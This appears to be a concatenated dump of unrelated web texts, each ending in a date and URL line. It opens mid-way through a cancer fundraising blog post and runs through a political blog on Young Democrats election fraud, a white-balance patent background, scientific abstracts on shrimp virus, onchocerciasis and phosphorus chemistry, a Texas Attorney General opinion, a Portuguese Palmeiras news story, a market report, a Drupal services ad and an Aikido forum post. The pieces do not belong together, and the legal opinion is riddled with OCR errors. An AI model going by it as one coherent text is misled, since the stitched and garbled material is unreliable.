My dream for her and for Wash is that they have a couple or three months where they don't have to worry about the necessities, and maybe have money for a few small luxuries, like a dinner out. Wash worries about being a burden, and he worries because he can't make things easier for the woman he loves. I would like it if that worry could be removed.
And Roger Fucking Ebert, of all the kick-ass people, has made that more possible. Because of a simple, solitary re-Tweet he did of this blog, and a follow-up that he did of Tashi's blog independent of this one, it's possible. It's just barely possible.
I told Tashi that the only reason this has all happened is because she conveys so well what it's like to care for somebody who's living with a brain tumor. She writes beautifully, and it's raw and often painful to read, and it's amazing. If she'd been one of those folks who misplaces apostrophes, things would have not turned out like this.
The tl;dr of all of this is this: I don't want Wash to die. If he has to, I want him to have a peaceful, gracious, dignified death unmarred by worry. I want his death to be as loving and joy-filled as his life has been. And I want Tashi there with him, and not having to worry about fucking money. And I want her to see that, even if living without him feels like all the air's been stolen out of the world, people still care about her.
*** *** *** *** ***
In other news, I would like to remind the readers of HN what they did this year:
They kept the author of the blog alive and hopeful. There were a lot of times I felt really dark and awful and like giving up, but somebody always emailed or commented and said exactly what I needed to hear. This is, obviously, the most important thing to me.
They bought a Therabite jaw rehab device for somebody who really, *really* needed it. The person in question had been through surgery and radiation and had a mouth opening of something like ten millimeters. The Therabite allowed her to stretch her jaw muscles to the point that she could eat, and brush her teeth, and talk intelligibly.
They donated nearly a thousand dollars to the Oral Cancer Foundation. That money will be used for research, education, and patient support. OCF is run by two people, mostly on one of the founder's money, and it provides *invaluable* support for people with head and neck cancer.
They donated a thousand bucks to Tashi and Wash when they needed it desperately. That money paid rent, bought at least two prescriptions, gassed up the car for appointments, paid co-pays, and bought Wash some hats to cover his bald head. And then some.
*** *** *** *** ***
Every couple of days has been a new year for me, these last few months. Every few days I'm filled with excitement and exultation over the possibilities that you all have brought to reality.
I am immensely thankful. This blog's readers are the best readers ever.
Thank you. I keep thinking that nothing could get any better, and you guys keep proving me wrong.
10 comments:
I had to Google it. "tl;dr" means "Too long; didn't read". I fear for the future of this country, when it ends up in the hands of people who have been texting such idiocy to each other their whole lives.
I'm not very good at words after my stroke, but I think you're genuinely helping to make (The Public's Perception Of) ALL of us nurses kind of "be" what it commonly used to "be," not that long ago, i.e., when your BACK is pressed-against-the-wall....and there ain't NO PLACE to turn for practical/get-real help....and there's really NO ONE to help you, either............ find.a.nurse.
Both Wash & Tashi's courage and tenacity: astonishing, genuinely astonishing. And this (relatively) young wife Tashi....with a love for her poor, dying husband Wash that *awes* even those of us (me) who've been married now for 37 years!!....has the word, (i.e., that *wonderful* LIFELINE word!), "Nurse" on her personal "Blogs I Follow" List............ just ONE time.
And all of us reading (the blog that we're reading) right now............ certainly know WHO that "lifeline" nurse is. (Even if the splendid outcome with Roger Ebert was unintentional, ya STILL make all of us look damn good, Jo. So there!!)
With thoughts & prayers for poor Wash & Tashi; and for you, too....dear "Jo of Arc," (scruffy-lookin' Nerf herder that you are, haha)!!Rosanna
I have been reading Tashi for a few months now, and then I found you. It is great that they got some money.
I live thousands of miles away but hope that someone reading this lives in AZ and finds a good cancer support group to adopt these two brae young people. Tashi is overwhelmed with managing his illness, with the myriad of runs to the pharmacy, doctors appointments, personal errands, shopping, cooking, ed, and the hundreds of other things that she has to do.
It is obvious that their families are indescribably useless, so i hope someone in AZ will take the task of finding some sweet folks to drop off some meals, make pharmacy and food runs, look for some entertainment for Wash and occasionally sit with him while Tashi gets out. It is great that the fraternity made a huge and meaningful financial donation, but there are a lot of them. How about doing some good deeds guys? I think there is a Jewish cancer support group there, anybody know them? Someone should step up and organize a daily visit/errand, whatever is needed. Tashi is too darn busy to organize it, but I know there is a mini-HeadNurse out there who could do this job in their sleep. Come on folks, money is good, even great, BUT NOT ENOUGH.
It is truly amazing an magical to see all the good that you have brought to so many people. Especially since it was through your writing and healing, during a time when many people would have simply retreated into a dark place of despair.
I'm pinging my aunt in AZ to see if her church is good for anything more than hating on LGBT & POC. Do you know where in AZ they are? I'm assuming all resources via the American Cancer Society and his hospital's case managers have been exhausted or are not available? Sorry I'm not reading through the entire blog to get details - wouldn't normally be so lazy but am adjusting to new pain meds so my attention span is fruit fly meets boiled doily right now. If you'd rather answer offline or I'm being clueless and not seeing the answers right in front of me, pls to inform or can email me at inkgrrl at gmail.com if easier way to apply clue bat. | 2024-04-04T01:27:15.642919 | https://example.com/article/3263 |
A blog by Eapen Thampy
Corruption at YDA and a Modest Proposal for Change
I was hoping to finish the political blogging from this weekend’s Young Democrats of America national convention and get back to economics blogging, but there are too many issues that I feel are unresolved. The most pertinent ones right now are the rather credible (in my eyes) allegations of voter intimidation, outright bribery, and other mechanisms of vote fraud that came out of the election.
The basic problems are these. Voting at the YDA elections happens via an open ballot as per DNC bylaws. What this allows is for state chairs to functionally control their voting delegates: there were numerous allegations of blatant voter intimidation that came to my ears. The basic scenario is that state presidents can control their delegates by holding things like the plane ticket home as leverage.
There are two solutions. The first is obviously moving from an open ballot to a secret ballot. However this involves changing the DNC national bylaws, which might not be politically possible given the resources of those concerned with YDA elections. The second is to introduce some kind of structural change to the election process itself, where the people (state presidents) who are in charge of their delegation’s votes can’t control their delegations. Allowing state presidents to be the ones signing off on the legitimacy of the votes cast by their delegates allows them to control those votes and auction them off to the highest bidder. In this election, that’s precisely what happened; I know personally that a political deal was struck that cut Missouri’s votes in half and I have heard very credible allegations that the delegation from Washington D.C. received $2,500 to vote one way.
So what kind of structural change would fit the bill? I have a suggestion: use Twitter to conduct elections. The basic framework is that you have delegates register their twitter names when they register for the national convention. As candidates come up for election, all eligible candidates tweet their vote using a randomly selected hashtag. Now we are looking at an election where votes are not filtered through state presidents and a system where vote fraud is a lot more difficult. You can only count votes from twitter handles that have been registered, so you can ensure that the people casting the votes are the people who registered. And you make all votes 100% transparent, which massively increases the amount of leverage that any single entity has to have over voters to control their votes.
There are a couple objections. First, it’s possible that outside parties could try to hijack the hashtag and spam votes. However, the use of hashtags that have been randomly selected immediately prior to the vote makes this difficult. And the fact that Twitter is searchable means that you could create a simple program to filter out only the votes cast by registered delegates. Second, not everyone has Twitter; but that’s not a truly meaningful criticism, since signup is easy and free and it takes less than a minute to learn how to vote.
This obviously wouldn’t work or necessarily be appropriate for real governmental elections, which are conducted by secret ballot. But YDA isn’t a governmental organization and it isn’t even that big so it’s not plausible to imagine anyone having the resources to make a serious attempt at rigging the vote or crashing Twitter. If Twitter got involved as an independent third party and and set up/managed the back end of open elections, we can eliminate all the problems associated with the status quo and the massive conflict of interests involved. This might even be a viable revenue stream for Twitter.
I will posting more emails from Martin Casas and the St. Louis Young Democrats bearing out my allegations of misconduct and corruption in that organization either today or tomorrow. I don’t want him to be able to continue to operate in ways that are unethical if not blatantly illegal and hopefully my small corner of the internet will be a place where that can happen.
I mean that’s a valid concern. However we aren’t assuming this happens today; at the least we’re assuming this happens during the next election in 2 years. It is plausible to think that in 2 years the security gaps that allowed Russian hackers to shut down twitter briefly will be plugged by then and that the infrastructure that we’ll be using by then will be vastly more resilient. | 2023-12-31T01:27:15.642919 | https://example.com/article/7769 |
1. Field of the Invention
The present invention relates to a white balance correcting device, a white balance correcting method and a storage medium for correcting white balance, which are suited for use in a video camera.
2. Description of Related Art
White balance correcting devices for video cameras of these days are mainly arranged to use the outputs of image sensors without using external sensors. Some of the known white balance correcting devices are arranged to avoid the adverse influence of chromatic colors as follows. Color-difference signals R-Y and B-Y and a luminance signal Y obtained from a signal processing circuit are divided into a number of small blocks corresponding to a picture. The signals within each of these divided blocks are averaged. Then, color signal components close to white are extracted from the mean values thus obtained. The white balance is controlled by bringing the mean values of the extracted color signal components into zero (“0”).
FIG. 8 is a block diagram showing, by way of example, the arrangment of an image pickup apparatus having a conventional white balance correcting device. Referring to FIG. 8, an object image having passed through a lens 101 and an iris 102 is formed on an image sensor 103. The image sensor 103 outputs signals of primary colors R (red), G (green) and B (blue) obtained by photoelectric conversion. The R, G and B signals are sent respectively to A/D converters 104, 105 and 106 to be converted into digital signals. The R and B digital signals are respectively sent to white balance amplifiers 107 and 108 to have their gains controlled on the basis of control signals supplied from a microcomputer 115. The R and B signals processed by the white balance amplifiers 107 and 108 and the G signal from the A/D converter 105 are sent to a matrix circuit 109. The matrix circuit 109 is arranged to form a luminance signal Y and color-difference signals R-Y and B-Y from the R, G and B signals. The luminance signal Y and the color-difference signals R-Y and B-Y are sent respectively to D/A converters 110, 111 and 112 to be converted into analog signals. The analog signals thus obtained are sent to an encoder (not shown) which is arranged to convert these input signals into standard TV signals. The TV signals from the encoder are sent out from the encoder either to be displayed on a monitor or to be supplied to a magnetic recording apparatus. Some of such recording apparatuses are arranged to record these signals in the form of the digital signals without having them converted into the analog form.
Meanwhile, the signals Y, R-Y and B-Y from the matrix circuit 109 are also supplied to a picture dividing part 113. The picture dividing part 113 is arranged to divide one picture amount of each of the signals Y, R-Y and B-Y into 8 vertical sections and 8 horizontal sections to give a total of 64 blocks, as shown in FIG. 9. A mean value computing part 114 computes and obtains the mean value of each of the signals Y, R-Y and B-Y for every divided block. The 64 sets of the signals Y, R-Y and B-Y are sent from the mean value computing part 114 to the microcomputer 115. At the microcomputer 115, only the signals of such blocks that the values of the color-difference signal and luminance signal are within a certain range are extracted (i.e., the so-called white extracting process is performed), and only the signals thus extracted are integrated. This extracting range is as shown, by way of example, in FIG. 10.
FIG. 10 is a diagram showing the variation of vectors of the color-difference signals taking place as a result of changes in color temperature of an object of achromatic color with the signal R-Y on the ordinate axis and the signal B-Y on the abscissa axis. In a case where white balance has been attained when color temperature is 7000 K which corresponds to an outdoor condition, the color-difference signals are located at a point P1 in photo-taking indoors with an incandescent lamp (at about 3000 K). Conversely, when white balance has been attained indoors with the incandescent lamp, the color-difference signals are located at a point P2 in photo-taking outdoors (at about 7000 k). In other words, the changes of color-difference signals with the color temperature of an achromatic object take place within a hatched part shown in FIG. 10. Assuming that white balance is to be controlled within a practicable range of color temperature from 3000 K to 7000 K, the white balance control can be accomplished by using signals within an area represented by the hatched part shown in FIG. 10. Hereinafter, this area will be called a white extracting range. Further, since white balance obtained under the light of a fluorescent lamp which is tinged with green in spectrum is taken into consideration, a white extracting area employed generally somewhat spreads in the direction of the color G. Furthermore, restrictions are sometimes imposed on the luminance signal Y in addition to the restriction on the color-difference signals. For example, such a restriction is imposed on the luminance signal Y that the level of the luminance signal Y is required to be equal to or greater than 50 IRE which is 50% of standard luminance of the luminance signal Y.
The microcomputer 115 extracts only the signals of blocks in which the color-difference signals are within the above-stated white extracting area and the level of the luminance signal is at least 50 IRE, and then computes mean values of the thus-extracted color-difference signals. Then, the microcomputer 115 corrects the white balance by sending to the white balance amplifiers 107 and 108 such control signals that cause the mean values of the color-difference signals R-Y and B-Y to become “0”.
However, the conventional arrangement described above has presented the following problems.
While a shooting object having a white portion largely distributed presents no problem, it is apt to be difficult to accurately extract white from such an object that has a white part finely distributed on a picture. FIGS. 11 and 12 are diagrams showing the respective objects on the picture for the purpose of explaining this problem. FIG. 11 shows the state of a block-divided picture on which a large image of a person in white clothes appears with a background of chromatic color. In this case, a white part of the image largely exists within the divided blocks indicated by arrows in FIG. 11. Therefore, if the color-difference signals are averaged within each of the divided blocks, white can be accurately extracted.
FIG. 12, on the other hand, shows a small image of the person in white clothes on the picture. The white part of the image does not much exist within the divided blocks as indicated by arrows in FIG. 12. Therefore, the white color and the color of the background are commingled when the signals within each of the divided blocks are averaged. In that case, the white extraction cannot be accurately accomplished. Assuming that the background is in a green color of turfs, the white part of the object and the green of the background mix together to result in a light green color, which prevents accurate white extraction in the event of the small white part in the divided blocks as shown in FIG. 12, although the white extraction can be accurately accomplished in the case of large white parts as shown in FIG. 11.
FIG. 13 is a color-difference signal vector diagram showing how colors are commingling in the case of the object shown in FIG. 12. The white clothing point Pa and the green background point Pb are caused to commingle by the averaging of the inside of each divided block. At the time when the microcomputer 115 reads signals, the two different colors commingle into a light green color point Pc. Since this point Pc is located within the above-stated white extracting range, the microcomputer 115 attempts to correct and make this point Pc white. FIG. 14 is a color-difference signal vector diagram showing a state obtained by the white balance correction. After the white balance correction, the light green color point Pc has become a white-balance-corrected point Pc′. The position of the point Pc′ is corrected at the center of vectors. Then, the white clothing point Pa of the object is erroneously corrected to a point Pa′, and the green background point Pb is also erroneously corrected to a point Pb′, as shown in FIG. 14. As a result of this white balance correction, the white clothing of the object comes to be tinged with a purplish color while the green color of the background becomes a lighter green color. Such an erroneous color correction has presented a problem.
Another problem of the prior art lies in that, although the above-stated problem may be mitigated by arranging the picture to be divided into more finely divided areas, such an arrangement not only causes an increase in size of the circuit arrangement, but also makes a period of time required for computing processes longer. | 2024-03-28T01:27:15.642919 | https://example.com/article/8055 |
Sequencing and amplified restriction fragment length polymorphism analysis of ribonucleotide reductase large subunit gene of the white spot syndrome virus in blue crab (Callinectes sapidus) from American Coastal Waters.
In the present study, the existence of white spot syndrome virus (WSSV) in blue crab (Callinectes sapidus) collected from 3 different American coastal waters (New York, New Jersey, and Texas) was confirmed by 2-step diagnostic polymerase chain reaction and in situ hybridization analysis. When geographic isolates were also compared using a gene that encodes the WSSV ribonucleotide reductase large subunit RR1 (WSSV rr1), a C(1661)-to-T point mutation was found in the New Jersey WSSV isolated. This point mutation, which resulted in the creation of an additional RsaI endonuclease recognition site, was not found in the WSSV from the New York and Texas blue crab samples, or in the WSSV Taiwan isolate, or in any of the other WSSV geographical isolates for which data are available. WSSV rr1-specific RsaI amplified restriction fragment length polymorphism of an amplified 1156-bp fragment thus distinguished the New Jersey blue crab samples from the other WSSV isolates. | 2024-03-06T01:27:15.642919 | https://example.com/article/7686 |
NET GENE
EXAS
Hon. Coke R. Stevenson, Jr. Opinion No. M-61
Administrator
State Liquor Control Board Re: Whether the State Build-
Sam Houston State Office Bldg. lng Commlsslon can enter
Austin, Texas 78711 into a legally binding
contract with a contractor
for constructionof a
collection station, 'when
constructionthereof Is
to commence prior to the
constructionsite being
transferredby Mexico to
the United States under
Dear Mr. Stevenson: existing agreements.
In your recent letter, you Informed the Attorney
General's Office that the State Building C~lsslon desires
to enter Into a~contract prior to the end of the 1966-67,fiscal
year for constructionof a collection station for collecting
taxes on liquors Imported Into this State at the Cordova
Crossing, El Paso, Texas; that the,land upon which the collec-
tion station la to be located, although scheduled to be trans-
ferred to the United States on or about September 1, 1967,
under the Chamlzal Agreement, la presently within the boundaries
and jurisdictionof Mexico. Correspondenceattached to the
aforementionedletter reflects that the revenue collection
station Is to be located on United States Government land under
an agreement between the Texas Liquor Control Board and the
General Services AdmInIstration.
You have requested an opinion as to whether the State
of Texas may enter Into a legally binding constrmctloncontract
fdr such collection statlon~~.beSore
title to said land has actual-
ly vested In the United States.
The State ,BulldlngCommission la authorized by the
Constitution, "under such terms and conditions as are now or
may be hereafter provided by law,' to "acquirenecessary real
and personal property . . . build and equip buildings for State
purposes, and negotiate and make contracts necessyy to carry
out and effectuate the purposes herein mentioned. Article III,
Section 51-b(c), Texas Constitution.
- 285 -
.
Hon. Coke R. Stevenson, Jr., page 2 (M-61)
The Legislature,by virtue of similar provisions In
Section 3, Article 678m, Vernon's Civil Statutes, conferred ex-
press authority on the State Building Commlsslon as Sollows:
"The Commission shall have the authority to
promulgate such rules and regulationsas It deems
proper for the effective administrationof this
Act. Under such terms and conditionsas may be
provided by law, the Commissionmay acquire neces-
sary real and personal property, . . . build and
equip buildings for State purposes, and make con-
tracts necessary to carry out and effectuate the
purposes herein mentioned In keeping wltQ appro-
priations authorized by the Legislature.
In that regard, you also Informed us In your afore-
mentioned letter that "the legislatureappropriatedmoney for
the constructionof a collectionbooth for the collectlon,of
taxes on llquorj Imported Into Texas at the Cordova Crossing In
El Paso, Texas.
In pertinent part the InternationalBoundary and Water
Commission'sMinute No. 219, dated July 1.6, 1965, approved by
the United States and Mexican Governments,provides In Resolution
NO. 6, in part, as follows:
“6 . In order that each Governmentmay oppor-
tunely construct the new inspectionfacilities
contiguous to the new bridges, the two Governments,
as soon as practical conditionsmay permit, shall
mutually make available to each other the lands
now In their respective jurisdictionsthat may be
required. For the constructionof the new inspec-
tion facilities each Governmentmay make use of
any competent public or private agencies in ac-
cordance with the laws of Its country. In exe-
cuting the constructionof new Inspection Saclll-
ties, In the territory under the jurisdictionof
the other country, each Government shall observe
the laws of that country, with the exemptions and
Sacllltles hereinafter stated:
"(a) All materials, Implements,equipment
and repair parts Intended for the construction
shall be exempt from taxes relating to Imports
and exports. For this purpose, each Section of
the Commission shall furnish verificationcertl-
flcatea covering all materials, Implements,equlp-
ment and repalr parts Intended for the construction
- 286 -
Hon. Coke R. Stevenson,Jr., page 3 (M-61)
of such works.
"(b) The personnel employed either directly
or Indirectly on the constructionshall be per-
mitted to pass freely from one country to the
other for the purpose of going to and from the
constructionsite, without any Immigrationre-
strictions,passports, or labor requirements.
For this purpose, each Section of the Commlasio~
shall furnish adequate means of identification
to the personnel empioyed by Its Government on
the aforesaid works.
Pursuant to this agreement, the Mexican Governmenthas set aside
a certain portion of land at the Cordova Crossing for use by the
United States Government In constructingInspectionfacllltles.
In turn, the General Services Admlnlstratlonhas contractedwith
the Texas Liquor Control Board to provide a portion of the said
land for the constructionof a booth for the collection of taxes
on liquors Imported Into Texas at the said Cordova Crossing. It
can thus be seen that the State of Te%as is not taking title
to the land In question, but Is utilizing It under a lease agree-
ment with the United States Government.
Based upon the aforesaid lease agreement with the
General Services Administration,It Is the opinion of this of-
fice that Article 678~11,Section 5, provides ample authority for
the State Building Commlsslon to enter Into a valid contract,
prior to September 1, 1967, for the constructionof a collection
station In the furtheranceof valid State objectives,and the
time of the passage of title to the U.S. Governmenthas no bear-
ing on the question.
S U M M A R.3
The State Bulldlng Commission can enter Into
a valid contract, prior to September 1, 1967, for
the constructionof a collection station for col-
lecting taxes on liquors Imported Into this State
at the Cordova Crossing, El Paso, Texas, although
the constructionthereof Is to commence prior to
the constructionsite being transferredby Mexico
to the United States under the amlzal Agreement.
/IF
Y
I. .
Hon. Coke R. Stevenson,Jr.;'page &(Mdl)
Prepared by Malcolm L. Quick
Assistant Attorney General
APPROVED:
OPINION COMMITTEE
Hawthorne Phillips, Chairman
W. V. Geppert, Co-Chairman
Arthur Sandlln
John Reeves
Llnward Shivers
STAFF LEGAL ASSISTANT
A. J. Carubbl, Jr.
- 288 -
| 2023-10-07T01:27:15.642919 | https://example.com/article/4805 |
Um vídeo publicado no Facebook na noite do último domingo (1) e que começou a viralizar em outras redes sociais nesta manhã mostra dois homens sentados nas cadeiras do setor Gol Norte do Allianz Parque, sendo hostilizados e em seguida deixando o estádio, onde o Palmeiras foi derrotado por 3 a 1 pelo Flamengo em jogo da 36ª rodada do Campeonato Brasileiro. Ambos não vestiam camisas do Palmeiras e foram considerados infiltrados por uniformizados que estavam na área.
Um até gritou: "Você é palmeirense? Então me dá seu celular", como um pedido para que ele provasse sua torcida. O Palmeiras investiga o caso e promete expulsar os envolvidos na coação de seu quadro associativo.
Os dois homens se chamam Joabes Santos e Diego Lima e pouco reagem durante a gravação feita por outro torcedor. Lima, aliás, é um ex-jogador profissional de futebol de 34 anos que está aposentado desde 2017. Hoje ele dá aulas de futebol na escolinha do Botafogo de Guaianazes, um clube amador da Zona Leste de São Paulo, além de treinos particulares de futebol e jogos na várzea. Ele diz que é torcedor do Palmeiras de infância e tem o costume de frequentar jogos ao lado de amigos, inclusive como convidado de jogadores de quem é amigo, como Renê Júnior, do Corinthians.
"Foi tudo tranquilo até aquele momento. Eu estava com a minha esposa e meu amigo estava com a esposa e a filhinha. Deixamos as três no Shopping Bourbon e fomos assistir ao jogo. Nem fomos para o lado da Mancha [principal organizada do Palmeiras], fomos para um lugar que tinha outras pessoas não uniformizadas. Quando terminou o primeiro tempo um grupo se virou para nós, disse que não estávamos de camisa e que éramos torcedores do Flamengo. Aí começou toda aquela humilhação, porque outros que nem sabiam o que estava acontecendo já acreditaram naquilo", conta, ao UOL Esporte, Diego Lima, que segue:
"Nunca passei por algo tão humilhante, fiquei surpreso. Os caras do nada vieram falar que éramos infiltrados, chamando de molambos. Poxa, eu torcia para o Palmeiras quando moleque. Cresci como jogador de futebol, então não tive mais aquela animação de torcedor, mas fui para assistir um bom futebol. Nem pensei sobre a camisa, completamente sem maldade. Não somos frequentadores, era minha primeira vez no estádio. Mas infelizmente aconteceu. Quando saímos dali o pessoal do andar de cima começou a cuspir na gente, alguns torcedores correndo atrás. Meu amigo teve que entrar dentro de uma lanchonete, eles entraram atrás. Até que alguns policiais chegaram. Pensei que o mal ia acontecer, pensei o pior. Fomos assistir ao jogo e obrigados a sair como se tivéssemos cometido um erro."
O Palmeiras se manifestou sobre o assunto por meio de uma nota publicada em seu site. O clube diz que o ato de seus torcedores não reflete "a história agregadora da nossa instituição": "O respeito ao próximo é o mínimo que se espera em qualquer ambiente, ainda mais em uma praça esportiva."
Amigos Joabes Santos e Diego Lima publicaram foto antes da partida entre Palmeiras e Flamengo começar Imagem: Reprodução/Facebook
No mesmo dia do jogo, Diego Lima publicou um texto no Facebook com o vídeo que recebeu de um amigo. Este vídeo foi enviado por um torcedor em um grupo de palmeirenses no WhatsApp e a legenda contava que um flamenguista infiltrado havia sido expulso. Um amigo de Diego reconheceu a ele e Joabes e enviou. No desabafo online, ele fala em "situação constrangedora" e reflete: "Onde vamos parar com tanta violência? Que país é esse? Minha vida sempre foi futebol, esses caras que fizeram isso com a gente são covardes. Não representam o Palmeiras de verdade."
"Minha intenção em publicar o vídeo foi para as pessoas terem consciência da gravidade que é o assunto. Imagina se eu tivesse levado meu filho para o jogo. É falta de respeito."
Lima atuou profissionalmente entre 2005 e 2017, quando se aposentou pelo Flamengo-PI. Ele chegou a defender o Belenenses, de Portugal, além de uma série de clubes nordestinos, como Central-PE, Sergipe-SE e Campinense-PB.
Veja a íntegra da nota oficial divulgada pelo Palmeiras:
"Estádio de futebol é, essencialmente, um espaço democrático, um lugar onde todos deveriam ser bem-vindos independentemente da camisa que vestem ou da forma como torcem e se expressam. A Sociedade Esportiva Palmeiras não compactua e não aceita quaisquer atos de intimidação, intolerância e discriminação em nossa casa. Os episódios do último domingo (01), em que espectadores foram coagidos a deixar o Allianz Parque por não seguirem um padrão de comportamento imposto de maneira autoritária, não refletem a história agregadora da nossa instituição.
Assim que tomamos conhecimento dos fatos, abrimos investigação para identificar os autores desses lamentáveis casos de violência que em nada contribuem para o bom convívio em sociedade. Se os responsáveis constarem do quadro de sócios Avanti do Palmeiras, serão sumariamente excluídos do programa. O respeito ao próximo é o mínimo que se espera em qualquer ambiente, ainda mais em uma praça esportiva." | 2024-02-19T01:27:15.642919 | https://example.com/article/3737 |
New York Markets After Hours
China’s industrial profit rebounds in October
ChrisOliver
Reuters
A ZTE factory in Shenzhen, China.
HONG KONG (MarketWatch) — Chinese industrial companies’ profits jumped in October — rising more than 20% from a year earlier and nudging into positive territory for the first 10 months of the year — bolstering a bullish view on the future of Chinese corporations and the broader economy.
Large industrial enterprises, or those with annual income of at least 20 million yuan ($3.2 million), reported profit of 500.1 billion yuan for the month, a rise of 20.5% from October 2011, the National Bureau of Statistics said Tuesday.
Bank of America-Merrill Lynch analyst Ting Lu said the data added to evidence of a rebound in China’s economy, and he expected other economists “to revise up their growth forecasts soon.”
Lu said the rebound was driven in part by falling raw-material prices, but also by a softer statistical comparison base a year earlier, which added a bit more sparkle to the October data.
Li & Fung to compensate fire victims
(3:06)
Global sourcing company Li & Fung offers compensation to the families of workers killed in a fire at a Bangladesh garment factory that is one of its suppliers.
He said that the rebound was also supported by a pick-up in exports and a turn in the inventory cycle, with companies now seeking to rebuild stockpiles of goods after hefty drawdown.
“Robust earnings growth in October lends further support to our above-consensus GDP growth forecasts in general and margin improvement views in particular. Going forward, we expect the street to turn more positive on short-term economic and earnings growth,” Lu said.
In the January-October period, profit for these companies totaled 4.024 trillion yuan, a rise of 0.5% from a year earlier, reversing from a 1.8% year-on-year decline in the previously reported January-September total.
The details showed profit at state-owned industrial enterprises of 1.127 trillion yuan in the in January-October, a drop of 9.2% from the same period last year. However, private companies’ profit for the 10-month segment rose to 1.262 trillion yuan, up 17% from a year earlier.
Despite the upbeat reading from Lu and others, Chinese stocks drew little support from the news, with the Shanghai Composite Index
000001, -3.06%
trading weaker at the open before coming under accelerated selling pressure. By the midday trading break, the index sat at 1,998.20 — below the psychologically important 2,000-point level and down 1% from its Monday close.
Intraday Data provided by SIX Financial Information and subject to terms of use.
Historical and current end-of-day data provided by SIX Financial Information. Intraday data
delayed per exchange requirements. S&P/Dow Jones Indices (SM) from Dow Jones & Company, Inc.
All quotes are in local exchange time. Real time last sale data provided by NASDAQ. More
information on NASDAQ traded symbols and their current financial status. Intraday
data delayed 15 minutes for Nasdaq, and 20 minutes for other exchanges. S&P/Dow Jones Indices (SM)
from Dow Jones & Company, Inc. SEHK intraday data is provided by SIX Financial Information and is
at least 60-minutes delayed. All quotes are in local exchange time. | 2023-11-03T01:27:15.642919 | https://example.com/article/6057 |
Professional Drupal customization: Drupal mods installation and design services. Top service guaranteed. 5 years of experience! Thank you for visiting us from the Drupal site.
We offer the following Drupal services:
Drupal customization services
We can develop any custom functionality for your Drupal site or expand an existing functionality. For example, we can bridge Drupal to work with other apps you might have on your site or create a new design or convert your existing site to Drupal.
$75
per hour*
$75/hour for our hosting customers and $85/hour for others
Drupal mod installation services
Drupal mod installation can be hard. Some just wouldn’t install while others just don’t work with your theme or conflict with other mods. We make sure everything works!
price
varies
If you didn’t find a mod that you need you can search for one in the MODs database. Then use our feedback form to submit your request.
Drupal hosting
We offer reliable hosting for your Drupal site, which includes free installation of Drupal, one free style of your choice and a logo from the picture you provide.
$81
per year
Drupal style development services
We can create a new theme for any version of Drupal from a design you might have or create a new one from scratch. Drupal styles will make your site more attractive and more professional.
$75
per hour*
$75/hour for our hosting customers and $85/hour for others
Drupal installation services
Drupal installation without a script can be tricky. That’s where we come in to make is happen for you in the easiest possible way. We can also help with database conversion when upgrading from the old versions of Drupal to a newer one.
$85
per hour
Drupal sample site
With our hosting can install Drupal with one click or even better we can do it for you for free!
2by2host offers reliable 100% network uptime, top of the line not overloaded reliable servers, assistance with Drupal nstallation and configuration, and great reliable tech support and customer service. Make the right choice!
If you would like a service but do not have enough of a budget, earn points through our affiliate program by referring customers to us and use them toward your project or service with us.
Have any questions?
Use the following form to submit them or call us at 917.558.8139 within US or +1 917 558 81 39 (International).
ALEXSales & marketing
GREGSenior developer
Use the form below and ask your questions
Fields with asterisk are required
You name *
Your email *
Your budget
Your questions *
up to 1 hour reply time guaranteed!
Customer testimonials
I started with a rather complicated vision for a new online community. The 2by2Host team was able to intepret the site requirements (there were many) into a new and unique way to use phpBB. On top of it all, I had never used phpBB before. I'm happy with how the site turned out, and in the first 3 weeks of beta launch, we already have over 40 members. I'm looking forward to adding functionality as the site grows. | 2024-01-03T01:27:15.642919 | https://example.com/article/2515 |
Onchocerciasis in the Benue State of Nigeria. II. Prevalence of the disease among the Tivs living in the Kwande Local Government area.
Between December 1979 and July 1980, a survey of the prevalence of onchocerciasis was carried out among the Tivs in the Kwande Local Government area of Benue State. Skin snips were taken from 372 people who were also inspected for the presence of skin nodules. Skin snips of 61, 72, and 71% of the people examined at Kuhe, Manor and Gube, respectively, showed Onchocerca volvulus microfilariae. The proportion of infected people increased with age, reaching a peak in the age group 31-40 years. Of the infected people 11.2% were blind; a higher proportion of infected males were blind compared with infected females. A greater proportion of infected males than females also had onchocercal nodules. | 2024-04-14T01:27:15.642919 | https://example.com/article/1970 |
Hammond Postulate Mirroring Enables Enantiomeric Enrichment of Phosphorus Compounds via Two Thermodynamically Interconnected Sequential Stereoselective Processes.
The dynamic resolution of tertiary phosphines and phosphine oxides was monitored by NMR spectroscopy. It was found that the stereoselectivity is set during the formation of the diastereomeric alkoxyphosphonium salts (DAPS), such that their initial diastereomeric excess (de) limits the final enantiomeric excess (ee) of any phosphorus products derived from them. However, (31)P NMR monitoring of the spontaneous thermal decomposition of the DAPS shows consistent diastereomeric self-enrichment, indicating a higher rate constant for decomposition of the minor diastereomer. This crucial observation was confirmed by reductive trapping of the unreacted enriched DAPS with lithium tri-sec-butylborohydride (commercially distributed as L-Selectride reagent) at different time intervals after the start of reaction, which gives progressively higher ee of the phosphine product with time. It is proposed that the Hammond postulate operates for both formation and decomposition of DAPS intermediate so that the lower rate of formation and faster subsequent collapse of the minor isomer are thermodynamically linked. This kinetic enhancement of kinetic resolution furnishes up to 97% ee product. | 2024-03-10T01:27:15.642919 | https://example.com/article/7702 |
Hello and thank you for visiting AikiWeb, the
world's most active online Aikido community! This site is home to
over 22,000 aikido practitioners from around the world and covers a
wide range of aikido topics including techniques, philosophy, history,
humor, beginner issues, the marketplace, and more.
If you wish to join in the discussions or use the other advanced
features available, you will need to register first. Registration is
absolutely free and takes only a few minutes to complete so sign up today!
I am translating a text from Japanese in which the text by O-Sensei which starts with "Aikido is love..." is included. I know it must be translated into English somewhere, and probably in a better version than I can create!
I have heard that it may be in one of the old Aiki Journal editions from around 1974-75. If anyone has the DVDs with these editions on them, and can find the text, could you help me, please?
The text may also be in one of the many Aikido books out there, I just can't find it in any of the ones I have.
For those who can read Japanese, the text goes:
"合気とは愛なり、天地の心を以って我が心とし、万有愛護の大精神を以って自己の使命を完遂する事こそ武の道であらねばならぬ、合気とは自己に打ち克ち敵をして戦う心なか らしむ、否、敵そのものを無くする絶対的自己完成の道なり、而して武技は天の理法を身体に移し霊肉一体の至上境に至るの技であり、道程である"
According to a chinese co-worker. This is a copy and paste of email I recieved back. I'm assuming he means aikido and not Taekwondo
